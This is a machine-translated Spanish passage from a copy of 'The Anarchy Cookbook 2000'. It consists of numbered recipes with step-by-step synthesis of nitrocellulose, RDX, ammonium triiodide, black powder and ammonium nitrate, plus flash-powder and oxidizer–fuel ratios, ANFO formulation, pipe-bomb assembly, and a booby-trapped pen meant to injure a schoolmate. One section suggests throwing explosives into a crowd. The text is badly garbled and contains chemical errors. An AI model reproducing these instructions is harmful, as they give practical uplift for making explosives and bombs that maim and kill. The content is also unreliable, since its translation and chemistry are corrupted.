Yo solía hacer de nitrocelulosa, sin embargo. No era pólvora de algodón de grado, porque no tienen petróleo (H2SO4 con SO3 disuelto), sin embargo funcionó. Al principio tuve mi H2SO4 a partir de una pequeña tienda en el centro de Filadelfia, Que se vendió ácido de sosa recargas de extintores. No sólo fue el ácido concentrado, barato y abundante, que venía con suficiente carbonato de limpiar. Yo añadiría KNO3 y un poco de agua (bueno, me gustaría añadir el ácido al agua -. Pero había tan poca agua, lo que se añade a lo que hizo una pequeña diferencia que salpicó H2SO4 concentrado en ambos sentidos). Más tarde, cuando pude comprar los ácidos, creo que he usado 3 partes a 1 parte de H2SO4 HNO3. Para el algodón, que haría uso de un algodón o un paño de algodón.

Nitración fugitivo era un lugar común, pero usualmente no es tan desastrosa con nitrocelulosa, ya que es con la nitroglicerina. Por alguna razón, he tratado de lavar la tela de algodón en una solución de lejía, y enjuague bien con agua destilada. Dejé que el paño seco y después se nitrados. (¿Leí en alguna parte?) Cuando ese producto nitrados, nunca tuve una reacción fuera de control. Por cierto, el agua se inactivó la reacción descontrolada de celulosa.

El producto se lavó a fondo y se deja secar. Se disolvió (o se convierte en papilla) en acetona. Se disuelve en alcohol / éter.

ADVERTENCIASTodas las advertencias habituales con respecto a los ácidos fuertes se aplican. H2SO4 le gusta salpicar. Cuando se cae en la piel, que destruye el tejido - a menudo dolorosamente. Se disuelve todo tipo de ropa. Nítrico también destruye la piel, convirtiéndose amarillo brillante en el proceso. Nítrico es un oxidante - que pueden provocar incendios forestales. Ambos agentes se feliz te vuelva ciego si tienes en tus ojos. Otras advertencias también se aplican. No es para el principiante.

La nitrocelulosa se descompone muy lentamente en el almacenamiento si no se estabiliza. La descomposición se autocatalyzing, y puede resultar en explosión espontánea si el material se mantiene confinado en el tiempo. El proceso es mucho más rápido si el material no se lava suficientemente bien. Polvos de nitrocelulosa contener estabilizadores, tales como difenil amina o CentraLite etilo. No permita que estos ENTRAR EN CONTACTO CON ACIDO NITRICO!! Una pequeña cantidad de cualquiera de los principios capturará las pequeñas cantidades de óxidos de nitrógeno que resultan de la descomposición. Por lo tanto, inhiben la autocatálisis. NC eventualmente se descompondrá en cualquier caso.

De nuevo, esto es intrínsecamente peligroso e ilegal en algunas áreas. Me salió con la suya. Usted puede matar a usted ya los demás si lo intentas.

La nitrocelulosa producido comercialmente es estabilizado por:

1. Spinning en una centrífuga grande para eliminar el ácido restante, que se recicla.2. La inmersión en una gran cantidad de agua fresca.3. Hervir en agua acidulada y lavarlo bien con agua dulce.

Si el CN se va a utilizar como polvo sin humo que se hierve en una solución de sosa, luego se enjuaga en agua dulce.

Cuanto más puro es el ácido utilizado (menor contenido de agua) de la más completa la nitración será, y produjo la más poderosa de la nitrocelulosa.

En realidad, hay tres formas de nitrato de celulosa, sólo una de las cuales es útil para fines pirotécnicos. El mononitrato y dinitrato no son explosivos, y se producen por nitración incompleta. Si nitración se deja proceder a completar la trinatrate explosiva se forma.

(Illinois 3.22.2)

Page 279: 106652012 the Anarchy Cookbook 2000 Es

CH OH CH ONO | 2 | 2 2 | | C ----- O ----- O HNO C / H \ 3 / H \ -CH-CH-O-->-CH-CH-O- \ H H / H SO \ H H / C ----- C 2 4 C ----- C | | | | OH OH ONO ONO 2 2

CELULOSA Trinitrato CELULOSA

190.Starter explosivos por Exodus

Hay casi un número infinito de mezclas de combustible oxidante-que pueden ser producidos por un individuo equivocado en su propio hogar. Algunos son muy eficaces y peligrosos, mientras que otros son más seguras y menos eficaz. Una lista de trabajo oxidante de combustible mezclas se presentará, pero las medidas exactas de cada compuesto son más que discutibles para lograr la máxima eficacia. Una estimación aproximada será dado de los porcentajes de cada combustible y el oxidante:

Oxidante % En peso Combustible % En pesoAcelerar Notas

Clorato de potasio 67% Azufre 33% 5 Fricción o impacto Sensible y de Desarrollo

Clorato de potasio 50% Azúcar 35% 5 Quema bastante lentoCarbón vegetal 15% Inestable

Clorato de potasio 50% Azufre 25% 8 Muy inestable! Magnesio o 25%El polvo de aluminio 25%

Clorato de potasio 67% Magnesio 33% 8 Inestable El polvo de aluminio 33%El nitrato de sodio 65% El polvo de magnesio 30% ?

Imprevisible Azufre 5% Permanganato de potasio 60% Glicerina 40% 4 Retraso antes de la ignición depende de tamaño de granoPermanganato de potasio 67% Azufre 33% 5 InestablePermanganato de potasio 60% Azufre 20% 5 Inestable Magnesio o 20% El polvo de aluminio 20%Permanganato de potasio 50% Azúcar 50% 3 ?Nitrato de potasio 75% Carbón vegetal 15% 7 Se trata de Polvo Negro!

Azufre 10% Nitrato de potasio 60% Hierro en polvo o 40% 1

Quema muy caliente Magnesio 40%Clorato de potasio 75% El fósforo Sesquisulfide 25% 8 Se utiliza para hacer huelga en cualquier lugar coincide conEl perclorato de amonio 70% El polvo de aluminio 30% 6

Combustible sólido para el transbordador espacial Una pequeña cantidad de óxido de hierro

El perclorato de potasio 67% Magnesio o 33% 10 Polvo de Flash(Perclorato de sodio) El polvo de aluminio 33%El perclorato de potasio 60% Magnesio o 20% 8 Suplente(Perclorato de sodio) El polvo de aluminio 20%

Polvo de Flash

Page 280: 106652012 the Anarchy Cookbook 2000 Es

Azufre 20%Nitrato de bario 30% El polvo de aluminio 30% 9

Suplente El perclorato de potasio 30%

Polvo de FlashEl peróxido de bario 90% El polvo de magnesio 5% 10

Suplente El polvo de aluminio 5%

Polvo de FlashEl perclorato de potasio 50% Azufre 25% 8 Un poco inestable

Magnesio o 25% El polvo de aluminio 25%Clorato de potasio 67% El fósforo rojo 27% 7 Impacto muy sensible inestable Carbonato de calcio 3% Azufre 3%Permanganato de potasio 50% azúcar en polvo 25% 7 Inestable Aluminio o 25% Enciende si se moja! El polvo de magnesio 25%Clorato de potasio 75% Carbón vegetal de polvo 15% 6

Inestable Azufre 10%

ADVERTENCIA: permanganato potásico se inflama espontáneamente con glicerina!

NOTA: Las mezclas que usan sustituciones de perclorato de sodio de perclorato de potasio se absorbentes de humedad y menos estable.

Cuanto mayor sea el número de marcado rápido, más rápido se quema la mezcla de combustible oxidante-después de la ignición. También, como regla general, más fino será el polvo, más rápida será la velocidad de combustión.

Como se puede ver fácilmente, existe una amplia variedad de mezclas de oxidante combustible que se pueden hacer en casa. Al alterar las cantidades de combustible y el oxidante (s), diferentes tipos de quemaduras se puede lograr, pero esto también puede cambiar la sensibilidad de la mezcla.

191.Flash polvo por el Dr. Tiel

Aquí están algunas precauciones básicas a seguir si estás lo suficientemente loco como para producir su propio flash en polvo:

1. Moler el oxidante (KNO3, KClO3, KMnO4, KClO4 etc) por separado en un recipiente limpio.

2. NUNCA moler o tamizar la composición mixta.3. Mezclar la composición en una hoja de papel grande, haciendo rodar la composición

de ida y vuelta.4. No guarde las composiciones de flash, especialmente en cualquiera de Mg que

contiene.5. Haga cantidades muy pequeñas al principio, así que usted puede apreciar el poder de

estas mezclas.

KNO3 50% (en peso)Mg 50%

Es muy importante tener el KNO3 muy seco, si la evolución de amoníaco se observó entonces el KNO3 tiene agua en ella. KNO3 muy puro y seco se necesita. KClO3 con Mg o Al polvos metálicos funciona muy bien. Muchas manos, rostros y vidas se han perdido con tales composiciones. KMnO4 con Mg o Al es también una composición extremadamente de gran alcance del flash. KClO4 con Al se encuentra generalmente en pirotecnia comerciales, esto no significa que es seguro, es un poco más segura que KClO3 anteriormente. K ² Cr ² O7 también se puede utilizar como un oxidante para el polvo de

Page 281: 106652012 the Anarchy Cookbook 2000 Es

flash. Cuanto más fino es el oxidante y el más fino es el polvo de metal más potente es el explosivo. Esto, por supuesto, también aumentará la sensibilidad del polvo de flash.

Por un flash rápido de pequeñas cantidades se puede quemar al aire libre. Las cantidades más grandes (50 gramos o más) encendidos al aire libre puede detonar, que no necesitan un contenedor para hacerlo.

NOTA: El polvo de Flash en cualquier recipiente estallará.

Ecuaciones balanceadas de algunas de las reacciones oxidantes / metal. Sólo los productos más importantes se consideran. El exceso de polvos metálicos se utilizan generalmente. Este exceso de quemaduras con el oxígeno atmosférico.

• 4 KNO3 + 10 Mg -> 2 K ² O ² N + 2 + 10 + MgO de la Energía• KClO3 + 2 Al -> KCl + Al ² O3 + Energía• 3 KClO4 + 8 Al -> 3 KCl + 4 ² Al O3 + Energía• 6 KMnO4 + 14 de Al -> 3 K ² O ² + 7 Al O3 + 6 Mn + Energía

Hacer Polvo Negro primero si usted nunca ha trabajado con los materiales pirotécnicos, luego pensar en estas cosas.

El Dr. Van Tiel - Ph.D. Química

Perclorato de potasio es mucho más seguro que el sodio / clorato de potasio.

Pen explosivo 192.The por Blue Max

Esto es un gran truco poco para jugar en su mejor demonio (no eso no es una errata) en la escuela, o tal vez como una broma a un amigo!

Materiales necesarios:1. Una bola de punto "Click" pluma 2. Pólvora 3. 8 o 10 cabezas de las cerillas 4. Un partido palo5. una hoja de papel de lija (1 ½ "x 2")

Instrucciones:1. Lápiz Destornille y quite todas las partes, pero dejar el botón en la parte

superior.2. Pegar la cerilla en la parte del clicker pluma donde las otras partes pequeñas y el

llenado de tinta fue.3. Rollo de papel de arena y poner todo el partido palo que está en el clicker.4. Coloque las cabezas de las cerillas que quedan dentro de la pluma, asegúrese de que

están en el interior en el papel de lija.5. Ponga un pedazo pequeño de papel o algo en el otro extremo de la pluma en la punta

de bola sale.6. Rellene el extremo con el pedazo de papel en él con pólvora. El trabajo es para

mantener el polvo se derrame.

La pluma final deberá tener el siguiente aspecto:

Pequeños de papel Clog Partidos Pólvora y papel de lija \ | | \ | | \ _________________ | ____________________ | ________ <_______________________________ | _______________ | ===

Bombas 193.Revised tuberías de Éxodo

Page 282: 106652012 the Anarchy Cookbook 2000 Es

En primer lugar, se aplana un extremo de un tubo de cobre o de aluminio con cuidado, asegurándose de no rasgar o romper las tuberías. Entonces, el extremo plano de la tubería debe ser plegada sobre al menos una vez, si esto no rasgar la tubería. Un agujero fusible debe ser perforado en el tubo cerca del extremo cerrado ahora, y el fusible debe ser insertado.

A continuación, la bomba-constructor podría llenar parcialmente la carcasa con un explosivo de bajo orden, y el paquete con un abultado fajo de papel de seda. A continuación, se aplanan y plegar el otro extremo del tubo con un par de alicates. Si no era demasiado tonto, que iba a hacer esto lentamente, ya que el proceso de plegado y doblado de metal desprende calor, lo que podría desencadenar el explosivo. Un diagrama se presenta a continuación:

(Illinois # 1) + ------- ++ ----------------------------------------------- + | || | O | |+ ----------------------------------------------- + | | + ------- +

Fig. 1 - Tubos con un extremo aplanado y orificio perforado fusible. [Ver arriba]

(Illinois # 2) + ----- + + ------------------------------------------- + | | | | | | F | | + ------------------------------------------- + | | + ----- +

Fig. 2 - Tubos con un extremo aplastado y doblado. [Ver arriba]

(Illinois # 3) ----------- + Fusible Hole | + ------------------------ O ---- + + ---- + | + + + - + | | + ---- + | | + ------ + | + + + ----------------------------- +

Fig. 3 - Tubos con el extremo aplanado y doblado. [Vista lateral]

194.SAFETY CONSEJOS - CÓMO NO a morir por el Éxodo

Un "gol en propia meta" es la muerte de una persona sobre su lado de uno de sus propios dispositivos. Es obvio que éstos deben ser evitados a toda costa. Si bien no hay ningún dispositivo de seguridad es 100% fiable, por lo general es mejor errar por el lado de la precaución.

NORMAS BÁSICAS DE SEGURIDAD

1. NO FUME! (No se ría - un cigarrillo andante acabó con la meteorólogos)2. Pique todos los ingredientes por separado. Es sorprendente lo sensible a la

fricción algunos supuestamente "seguros" son realmente explosivos.3. Permite un margen de error del 20% - El hecho de que la velocidad de combustión

media de un fusible es de 30 segundos por pie, no dependen de las 5 pulgadas que salen de la bomba de tubo para tomar exactamente 2 minutos y medio.

4. Sobrestimar el radio de alcance de la metralla. La tapa de una bomba casera a menudo se puede viajar de un bloque o varios a altas velocidades antes de venir a descansar - Si tienes que estar cerca, recuerde que si usted lo puede ver, te puede matar.

Page 283: 106652012 the Anarchy Cookbook 2000 Es

5. En la mezcla de compuestos sensibles (como Flash polvo) evitar todas las fuentes de electricidad estática. Mezclar los ingredientes por el método siguiente:

COMO MEZCLAR LOS COMPONENTES

La mejor manera de mezclar dos productos químicos secos para formar un explosivo es hacer lo que la pequeña escala del fabricante de fuegos artificiales hacer:

Ingredientes:• 1 hoja grande de papel suave (por ejemplo una página de un periódico que no utiliza

grapas)• Los productos químicos secos necesarios para el compuesto deseado.

1. Mida las cantidades apropiadas de los dos productos químicos, y se vierte en dos pequeños montones cerca de las esquinas opuestas de la hoja.

2. Recoger la hoja por las dos esquinas cerca de los polvos, permitiendo que los polvos para rodar hacia el centro de la hoja.

3. Al elevar una esquina y luego el otro, rodar los polvos de ida y vuelta en el centro de la hoja abierta, teniendo cuidado de no permitir el derrame de mezcla de cualquiera de los extremos sueltos.

4. Vierta el polvo fuera de la mitad de la hoja, y utilizar de inmediato. Si se debe almacenar utilizan envases herméticamente cerrados (35 mm frascos de la película funciona muy bien) y almacenar lejos de la gente, casas y objetos de valor.

Cristales 195.Ammonium triyoduro por el Éxodo

Cristales de amonio triyoduro son malolientes cristales de color púrpura que se descomponen bajo la ligera cantidad de calor, fricción o choque, si se hacen con el más puro amoniaco (hidróxido de amonio) y el yodo. Tales cristales se dijo para detonar cuando una mosca se posa en ellos, o cuando una hormiga camina a través de ellos. Amoniaco casero, sin embargo, tiene suficientes impurezas, tales como jabones y agentes abrasivos, de modo que los cristales detonar cuando se lanza, aplastado, o se calienta. El amoníaco, cuando compró en las tiendas viene en una variedad de formas. Los amoniacos de pino y nublado no se deben comprar, sólo el amoníaco claro debe ser utilizado para hacer cristales de amonio triyoduro. Después de la detonación, un fuerte disparo que se oyó, y una nube de gas de yodo morado aparece sobre el sitio de la detonación. Cualquiera que sea la superficie de lamentar que el cristal se detonó en general se estropeará, como parte del yodo en el cristal se produce sobre en una forma sólida, y el yodo es corrosivo. Deja desagradables, feas y permanentes de color marrón-púrpura manchas en lo que sea que haga contacto. De gas de yodo es también una mala noticia, ya que puede dañar los pulmones, y se deposita en el suelo y manchas de las cosas allí también. Tocar el yodo deja manchas marrones en la piel que duran alrededor de una semana, a menos que se inmediata y vigorosamente lavado. Mientras que un compuesto que tiene poca utilidad para un terrorista grave, un vándalo podría utilizarlos en daños a la propiedad. O bien, un terrorista podría lanzar varios de ellos a una multitud como una distracción, una acción que posiblemente perjudicaría a unas pocas personas, pero asustar a casi cualquier persona, ya que un pequeño cristal que no se puede ver cuando se lanza produce una explosión bastante fuerte.

Cristales de amonio triyoduro se podría producir de la manera siguiente:

Materiales:• Los cristales de yodo• Amoníaco claro (hidróxido de amonio, para el suicida)

Equipos:• Embudo y un filtro de papel• Las toallas de papel• Dos de usar y tirar frascos de vidrio

Page 284: 106652012 the Anarchy Cookbook 2000 Es

1. Coloca dos cucharaditas de yodo en uno de los frascos de vidrio. Las jarras deberán tirar porque nunca estará limpio de nuevo.

2. Añadir amoníaco suficiente para cubrir completamente el yodo.3. Coloque el embudo en el otro frasco y poner el papel de filtro en el embudo. La

técnica para poner el papel de filtro en un embudo que se enseña en cualquier laboratorio de química es: Dobla el papel circular por la mitad, de modo que un semicírculo formado. Luego, doblar por la mitad otra vez para formar un triángulo con un lado curvo. Tire un espesor de un papel para formar un cono y coloca el cono dentro del embudo.

4. Después de permitir que el yodo en remojo en el amoníaco durante un tiempo, se vierte la solución en el papel en el embudo a través del papel de filtro.

5. Mientras que la solución esta siendo filtrada, pon mas amoniaco dentro de la primera jarra para lavar cualquier cristal restante dentro del embudo y tan pronto como este desagüe.

6. Recoge todos los cristales de color púrpura, sin tocar el papel filtro café, y colocarlos en las toallas de papel para secar durante aproximadamente una hora. Asegúrese de que no están demasiado cerca de las luces o de otras fuentes de calor, ya que podrían detonar. Mientras están todavía húmedas, dividir el material húmedo en ocho piezas de aproximadamente el mismo tamaño.

7. Después de que se sequen, coloque suavemente los cristales en una sola pieza pulgada cuadrada de cinta adhesiva. Cubrir con una pieza similar, y presione suavemente la cinta adhesiva en conjunto alrededor del cristal, asegurándose de no presionar el propio cristal. Por último, cortar la mayor parte de la cinta adhesiva en exceso con un par de tijeras, y almacenar los cristales en un lugar fresco y seco y seguro. Tienen una vida útil de alrededor de una semana, y deben ser almacenados en recipientes individuales que puedan ser proyectados, ya que tienen una tendencia a descomponerse lentamente, un proceso que emite vapores de yodo, que se mancha todo lo que se asientan en. Una posible forma de incrementar su vida útil es para que los guarde en recipientes herméticos. Para usarlos, simplemente lanzarlos contra cualquier superficie o colocarlos en el que se pisado o aplastado.

196.Sulfuric ácido y Amm. El nitrato III por el Éxodo

El ácido sulfúrico es demasiado difícil hacer fuera de una planta de laboratorio o industriales. Sin embargo, es fácilmente disponible en una batería de automóvil sin carga. Una persona que desee hacer ácido sulfúrico simplemente quitar la parte superior de una batería de coche y verter el ácido en un recipiente de vidrio. No sería probablemente piezas de plomo de la batería en el ácido que tendría que ser eliminado, ya sea por ebullición o filtración. La concentración del ácido sulfúrico se puede aumentar también hirviéndola; ácido sulfúrico muy puro vierte ligeramente más rápido que el aceite de motor limpio.

Nitrato de AmonioEl nitrato de amonio es un muy poderoso pero insensible de orden superior explosivo. Se podría hacer muy fácilmente mediante el vertido de ácido nítrico en un matraz grande en un baño de hielo. Entonces, simplemente vertiendo amoníaco en el matraz y corriendo, nitrato de amonio se formaría. Después de que los materiales han dejado de reaccionar, simplemente tendría que dejar la solución en un lugar cálido hasta que toda el agua y el amoniaco o el ácido no neutralizado se han evaporado. No habría un polvo fino formado, lo que sería nitrato de amonio. Debe tenerse en un recipiente hermético, debido a su tendencia a recoger el agua del aire. Los cristales formados en el proceso anterior tendría que ser calentado muy suavemente para eliminar el agua restante.

197.Black Polvo III por el Éxodo

En primer lugar hizo por los chinos para su uso en fuegos artificiales, en polvo negro fue utilizado por primera vez en armas y explosivos en el siglo 12. Es muy sencillo de hacer, pero no es muy potente y seguro. Sólo alrededor del 50% de polvo negro se convierte en gases calientes cuando se quema, la otra mitad es principalmente

Page 285: 106652012 the Anarchy Cookbook 2000 Es

partículas muy finas quemadas. Polvo negro tiene un gran problema ... que puede ser encendida por la electricidad estática. Esto es muy malo, y significa que el material debe ser realizado con herramientas de madera o arcilla. De todos modos, una persona equivocada podría fabricar polvo negro en su casa con el siguiente procedimiento:

MATERIALES:• Nitrato de potasio (75 g)-o-nitrato de sodio (75 g)• El azufre (10 g)• Carbón vegetal (15 g)• Agua destilada

EQUIPO:• Clay recipiente de moler y arcilla ensaladera molinillo o de madera y una cuchara

de madera• Bolsas de plástico (3)• 300-500 ml Vaso (1)• Coffee Pot o fuente de calor

1. Colocar una pequeña cantidad del nitrato de potasio o sodio en el recipiente de moler y se muele a un polvo muy fino. Hacer esto para todo el nitrato de potasio o sodio, y almacenar el polvo molido en una de las bolsas de plástico.

2. Haga lo mismo con el azufre y el carbón, el almacenamiento de cada producto químico en una bolsa de plástico separada.

3. Coloque todo el suelo finamente nitrato de potasio o de sodio en el vaso, y añadir el agua hirviendo lo suficiente a la química para conseguir que todo mojado.

4. Añadir el contenido de las bolsas de plástico a otros el nitrato de potasio o sodio en húmedo, y mezclar bien durante varios minutos. Haga esto hasta que no haya más visible de azufre o carbón, o hasta que la mezcla es universalmente negro.

5. En un día cálido y soleado, poner el vaso de fuera, en la luz directa del sol. La luz del sol es realmente la mejor manera de secar el polvo negro, ya que nunca es demasiado caliente, pero es lo suficientemente caliente como para evaporar el agua.

6. Raspe el polvo negro del vaso de precipitados, y guárdelo en un recipiente seguro. El plástico es realmente el contenedor más seguro, seguido por papel. Nunca almacene el polvo negro en una bolsa de plástico, ya que las bolsas de plástico son propensas a generar electricidad estática.

198.NitroCellulose por el Éxodo

La nitrocelulosa se suele llamar "la pólvora" o "algodón pólvora". Es más estable que el polvo negro, y produce un volumen mucho mayor de gas caliente. También se quema mucho más rápido que el polvo negro cuando se encuentra en un espacio confinado. Por último, la nitrocelulosa es bastante fácil de hacer, como se indica por el procedimiento siguiente:

MATERIALES:• Algodón (celulosa)• El ácido nítrico concentrado• El ácido sulfúrico concentrado• Agua destilada

EQUIPO:• Dos (2) 200-300 ml Vasos• Embudo y un filtro de papel• Papel de tornasol azul

1. Vierta 10 cc de ácido sulfúrico concentrado en el vaso. Añádase a esto 10 cc de ácido nítrico concentrado.

2. Inmediatamente después, añadir ½ 0 g de algodón, y déjelo en remojo durante 3 minutos exactamente.

Page 286: 106652012 the Anarchy Cookbook 2000 Es

3. Retire el nitrocotton, y la transfiere a un vaso de agua destilada para lavarlo pulgadas

4. Deje que el material se seque y, a continuación, volver a lavar.5. Después de que el algodón es neutro cuando se ensaya con papel tornasol, que está

listo para ser secado y almacenado.

199.RDX II por el Éxodo

El RDX, también llamado ciclonita, o composición C-1 (cuando se mezcla con plastificadores) es uno de los más valiosos de todos los explosivos militares. Esto es debido a que tiene más de 150% de la potencia de TNT, y es mucho más fácil para la detonación. No debe ser utilizado solo, ya que puede ser desencadenada por un choque no muy severa. Es menos sensible que el fulminato de mercurio o nitroglicerina, pero es todavía demasiado sensible para ser utilizado solo.

NO 2 | N / \ RDX MOLÉCULA / \ H C H C / 2 2 / | O N N - NO 2 \ / 2 \ / \ / CH 2

RDX puede ser hecha por el método sorprendentemente simple se exponen a continuación. Es mucho más fácil de hacer en el hogar que todos los altos explosivos de otro modo, con la posible excepción de nitrato de amonio.

MATERIALES:• Hexamina-o-metenamina pastillas de combustible (50 g)• El ácido nítrico concentrado (550 ml) • Nitrato de Amonio • Agua destilada • Sal de mesa • Hielo

EQUIPO:• 500 ml Vaso • Varilla de vidrio • Embudo y un filtro de papel• Contenedor de hielo Baño (cuchara de plástico)• Centígrados Termómetro• Papel de tornasol azul

1. Coloque el vaso en el baño de hielo, (consulte los pasos 3-4) y con cuidado vierta 550 ml de ácido nítrico concentrado en el vaso.

2. Cuando el ácido ha enfriado por debajo de 20 ° C, añadir pequeñas cantidades de las tabletas ya molidas al vaso de precipitados. La temperatura se elevará, y debe mantenerse por debajo de 30 ° C, o podría resultar en graves consecuencias. Revuelva la mezcla.

3. La caída de la temperatura por debajo de 0 ° C, ya sea agregando mas hielo y sal para el baño de hielo viejo, o mediante la creación de un nuevo baño de hielo. El nitrato de amonio se podría añadir al baño de hielo viejo, ya que se vuelve frío

Page 287: 106652012 the Anarchy Cookbook 2000 Es

cuando se pone en el agua. Continuar agitando la mezcla, manteniendo la temperatura por debajo de 0 ° C durante al menos veinte minutos.

4. Verter la mezcla en un litro de hielo picado. Agite y revuelva la mezcla, y deje que se derrita. Una vez que se ha deshelado, filtra los cristales, y dispón del líquido corrosivo.

5. Coloque los cristales en un medio un litro de agua destilada en ebullición. Filtra los cristales y ponerlos a prueba con el papel tornasol. Repita los pasos 4 y 5 hasta que el papel tornasol permanezca azul. Esto hará que los cristales más estables y seguros.

6. Guarde los cristales húmedos hasta que esté listo para su uso. Deje que se seque por completo su uso. El RDX no es lo suficientemente estable como para usar solo como un explosivo.

7. La composición C-1 se puede hacer mezclando 88,3% de RDX (por peso) con aceite mineral 11,1%, y 0,6% de lecitina. Pon estos materiales juntos en una bolsa de plástico. Esta es una forma de insensibilizar al explosivo.

8. HMX es una mezcla de TNT y RDX; la proporción es de 50/50, en peso. No es tan sensible, y es casi tan poderoso como el RDX recta.

9. Mediante la adición de nitrato de amonio a los cristales de RDX después del paso 5, debería ser posible insensibilizar el RDX e incrementar su potencia, puesto que el nitrato de amonio es muy insensible y poderoso. Sódico o nitrato de potasio también se podría añadir; una pequeña cantidad es suficiente para estabilizar el RDX.

10. RDX detona a una velocidad de 8550 metros por segundo cuando se comprime a una densidad de 1 ½ 5 g / cm cúbicos.

200.Black Puerta de BBS por el Éxodo

| | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | SS libras Aeck Puerta § § | | | | | | | | | | | | ---- Πσδe 1 | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | I £ DCAT 3,90 | | | | | | | | | | ÆÇïd_ïÇÉ dit · + --- + | | | | | | | | CHAO ² | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | | 1 * (20!)-LE-suck | | | | | | | | CORREO EliTe 2 * (20!)-REAL-BAD | | | | | | | | | | - = (NO sanguijuelas) = - | | | | | | | | | | FL, NY, NY, CA 2 RinGdoWN 9600 | | | | | | | | | | | | Conexiones Local 1 57000 @! | | | | | | | | | | | | -0 + WareZ DÍA | | Åçïd_ƒ libras eh | | Sysop - Éxodo

201.ANFOS por Dean S.

ANFO es un acrónimo de nitrato de amonio - Solución de Fuel Oil. Un ANFO resuelve el único otro gran problema con el nitrato de amonio: su tendencia a recoger el vapor de agua desde el aire. Esto da como resultado el explosivo fallan para detonar cuando tal se hace un intento. Esto es rectificada mediante la mezcla de 94% (en peso) de nitrato de amonio con aceite combustible 6%, o queroseno. El queroseno mantiene el nitrato de amonio de absorber humedad del aire. Un ANFO también requiere de una onda de choque grande para que la desactive.

Page 288: 106652012 the Anarchy Cookbook 2000 Es

Acerca de ANFOÚltimamente no se hablado mucho sobre mezclas ANFO diversos. Estas son las mezclas de nitrato de amonio con aceite combustible. Esto forma un explosivo comercial razonablemente potente, con su principal ventaja es el hecho de que es barato. ANFO a granel se debe ejecutar alguna parte alrededor de 9.12 centavos de dólar la libra. Esto es muy barata en comparación con el 40% de nitro dinamita en gel de 1 a 2 dólares la libra. Para mantener el costo abajo, con frecuencia se mezclan en el pozo por un camión a granel, que tiene una tolva de suministro neumático de AN gránulos (que es gránulos a la mayor parte del mundo) y un tanque de combustible. Se recomienda que un tinte de algún tipo, preferiblemente de color rojo se añade al aceite combustible para que sea más fácil distinguir trató a un explosivo de oxidante no tratada.

ANFO no está exenta de problemas. Para empezar, no es tan sensible a la detonación. Número ocho tapas no son confiables cuando se usan con ANFO. Cargas de refuerzo se debe utilizar para evitar los agujeros sin fondos por onda expansiva. Impulsores comunes incluyen cartuchos de dinamita diferentes, pequeña derrama de explosivos de gel de agua, aceleradores detaprime Dupont de fundición, y el reparto de poder de Atlas imprimación explosivo. La necesidad de utilizar aceleradores aumenta el costo. En segundo lugar, ANFO es muy susceptible de agua. Se disuelve en ella, o lo absorbe de la atmósfera, y se hace muy rápido verdadero valor. Debe ser protegido del agua con camisas de pozos, y todavía se les debe disparar muy rápido. En tercer lugar, ANFO tiene una densidad baja, alrededor de 0,85. Esto significa ANFO flotador sacos, lo que no es bueno, y, además, la baja densidad significa que el poder es algo baja. Generalmente, el peso más de un explosivo puede colocar en un agujero, el más eficaz. ANFO soplado en el agujero con una fractura del sistema neumático, ya que es lugares, aumentando la densidad de aproximadamente 0,9 o 0,92. El sistema de suministro se añade al coste, y debe ser antiestático en la naturaleza. El aluminio se añade a algunas Anfós comerciales, cartuchos envasados para aumentar la densidad --- esto también plantea un poder considerable, y algunas de estas mezclas se forma fiable limitar sensible.

Ahora que, para las formulaciones. En un artículo anterior mencionado 2 kilos y medio de nitrato de amonio, y creo que de 5 a 6 litros de diesel. Esta mezcla es extremadamente más alimentado, y me sorprendería si funcionaba. Dupont recomienda una relación de AN a FO de 93% AN FO a 7% en peso. Casi todo el aceite en absoluto. Más del petróleo hace que la mezcla menos explosiva mediante la absorción de la energía de detonación, y el exceso de combustible hace que productos derivados de la detonación riesgos para la salud como la mezcla es pobre en oxígeno. Tenga en cuenta que los productos fertilizantes comerciales no funcionan tan bien como la porosa UN vende pepitas de DuPont, porque los fertilizantes están recubiertos con diversos materiales destinados a sellar la humedad, los que guardan el aceite sea absorbido.

Otro problema con ANFO: para la detonación fiable, necesita confinamiento, ya sea de una carcasa, pozo, etc, o de la masa de la carga. Así, una pila de la materia con un refuerzo en que es probable que la dispersión y quemar en lugar de explotar cuando el refuerzo es disparado. En pozos de sondeo, o razonables cubiertas fuertes (de cartón o sacos pesados de película de plástico) el material detonado muy bien. Lo mismo ocurrirá con pilas grandes. Así es como el potencial explosivo fue descubierto: un carguero de petróleo de un barco pequeño chocó contra productos químicos a granel. Durante varias horas las cargas mezcladas en cierta medida, y alcanzó la masa crítica. Big Bang Real. Una forma útil para obtener la necesaria contención es reemplazar el aceite combustible con un combustible cera. Mezclar el AN con cera fundida suficiente para formar una mezcla cohesiva, molde para darle forma. Los combustibles de cera, y retiene la mezcla. Esto es lo que los militares de EE.UU. utiliza como un hombre colocado cargo la formación de cráteres. Los estados de la literatura militar que puede ser desencadenada por un detonador, pero es importante recordar los detonadores militares son considerablemente más potentes que los comerciales. El ejército insiste con razón en la fiabilidad, y por lo tanto una PAC fuerte (tal vez el 70-80 por ciento más fuerte que la comercial). También tienden a ir por la borda en el cálculo de cargas de demolición ...., pero bueno, quién no lo hace ...

Page 289: 106652012 the Anarchy Cookbook 2000 Es

Dos manuales de interés: Dupont "Blaster" Manual, manual de $ 20 se utiliza principalmente para operaciones de rock y sismográficas. Atlas "en polvo manual" o "Manual de la voladura de rocas" (no recuerdo el título, está en la oficina). Este es un libro de 60 dólares, vale la pena el dinero en efectivo, que trata de estos dos temas, además de demoliciones y voladuras no cantera.

Incidentalmente, la combinación de aceite combustible y nitrato de amonio constituye la fabricación de un alto explosivo, y requiere un permiso federal para fabricar y almacenar. Incluso las minas que se mezclan en el sitio requieren el permiso para la fabricación. Aquellos que no producen sólo necesitan permisos para almacenar. Aquellos que no necesita almacenar ningún permiso, que incluye la mayoría de nosotros: nadie, al menos en los EE.UU. pueden comprar explosivos, siempre que sean mayores de 21 años, y no tienen antecedentes penales. Tenga en cuenta que deben ser utilizados de inmediato, porque usted necesita una licencia para almacenar. Tenga en cuenta también que los explosivos comerciales contienen cantidades de agentes de búsqueda, que hacen muy fácil para el FBI para rastrear la explosión para el comprador, así que por favor, golpe que nadie de seguridad de los bancos, orfanatos o asilos de ancianos, está bien.

Ácido 202.Picric por el Éxodo

